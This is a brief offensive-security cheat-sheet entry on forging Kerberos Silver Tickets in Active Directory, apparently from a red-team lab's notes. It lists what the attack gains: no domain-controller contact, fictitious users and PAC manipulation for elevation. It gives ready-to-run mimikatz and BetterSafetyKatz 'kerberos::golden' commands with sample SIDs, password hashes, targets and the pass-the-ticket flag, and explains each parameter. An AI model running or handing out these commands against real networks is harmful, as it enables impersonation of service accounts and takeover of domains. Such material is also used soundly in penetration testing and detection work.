Silver Tickets

• related to [Golden Tickets]

Background

• after a SPN has been cracked, we can use that to create a silver ticket

Silver Tickets do offer several benefits, including the following:

• The attacker is not required to authenticate the account to the domain controller to obtain the forged TGS, so they can proceed without creating network traffic and event logs to avoid detection.
• A Silver Ticket can be created for any user account, even fictitious accounts. This allows the attacker to exploit the service account without risking detection, which could result in a password reset and loss of access.
• The Privileged Attribute Certificate (PAC) in the TGS ticket can also be manipulated to elevate the account’s access to Domain In most cases, the PAC is not validated against the domain controller when the TGS is provided.

usage

$ whoami /user # write down the current user SID
 
$ mimikatz # kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin

PS> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /target:us-dc.us.techcorp.local /service:HOST /aes256:36e55da5048fa45492fc7af6cb08dbbc8ac22d91c697e2b6b9b8c67b9ad1e0bb /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Params:

• sid: the current user (from the initial line)
• user: forgning a random user name
• id: forgning a random user id
• target: server hosting the attacked service for which the TGS ticket was created
• service: service being attacked
• rc4: NTLM hash of the password the TGS ticket was encrypted with

references

• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
• https://blog.netwrix.com/2022/08/31/impersonating-service-accounts-with-silver-tickets/